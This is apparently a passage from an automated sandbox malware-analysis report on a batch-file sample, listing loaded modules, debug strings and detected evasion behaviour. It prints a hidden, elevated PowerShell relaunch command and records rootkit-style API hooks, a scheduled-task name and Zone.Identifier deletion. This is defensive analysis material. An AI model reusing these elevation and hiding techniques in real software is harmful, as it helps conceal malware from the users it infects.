        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: fsutilext.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: skf7iF4.batStatic file information: File size 6302909 > 1048576
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb0A5 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BCC62D push rcx; retf 003Fh4_3_000001B780BCC62E
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_000002640730C62D push rcx; retf 003Fh5_3_000002640730C62E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B2A00BD pushad ; iretd 12_2_00007FF88B2A00C1
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE50C62D push rcx; retf 003Fh16_3_00000234FE50C62E
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92787C62D push rcx; retf 003Fh17_3_000001B92787C62E
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AECC62D push rcx; retf 003Fh18_3_000002158AECC62E
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDDC62D push rcx; retf 003Fh19_3_000001E89FDDC62E
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08892C62D push rcx; retf 003Fh20_3_000001F08892C62E
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F5C62D push rcx; retf 003Fh21_3_000001AC86F5C62E
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F9C62D push rcx; retf 003Fh22_3_0000014785F9C62E
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CFC62D push rcx; retf 003Fh23_3_000001DC59CFC62E
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDCC62D push rcx; retf 003Fh25_3_0000017A8CDCC62E
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26EC62D push rcx; retf 003Fh27_3_00000220C26EC62E
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E7C62D push rcx; retf 003Fh28_3_0000025AF1E7C62E
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5DC62D push rcx; retf 003Fh29_3_0000027BFF5DC62E
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE057C62D push rcx; retf 003Fh30_3_000001CEE057C62E
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B37C62D push rcx; retf 003Fh31_3_000001B12B37C62E
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-mPeY5dGdJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: OpenProcess
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwQueryKey
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: OpenThread new code: 0xE9 0x92 0x23 0x33 0x3F 0xFC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
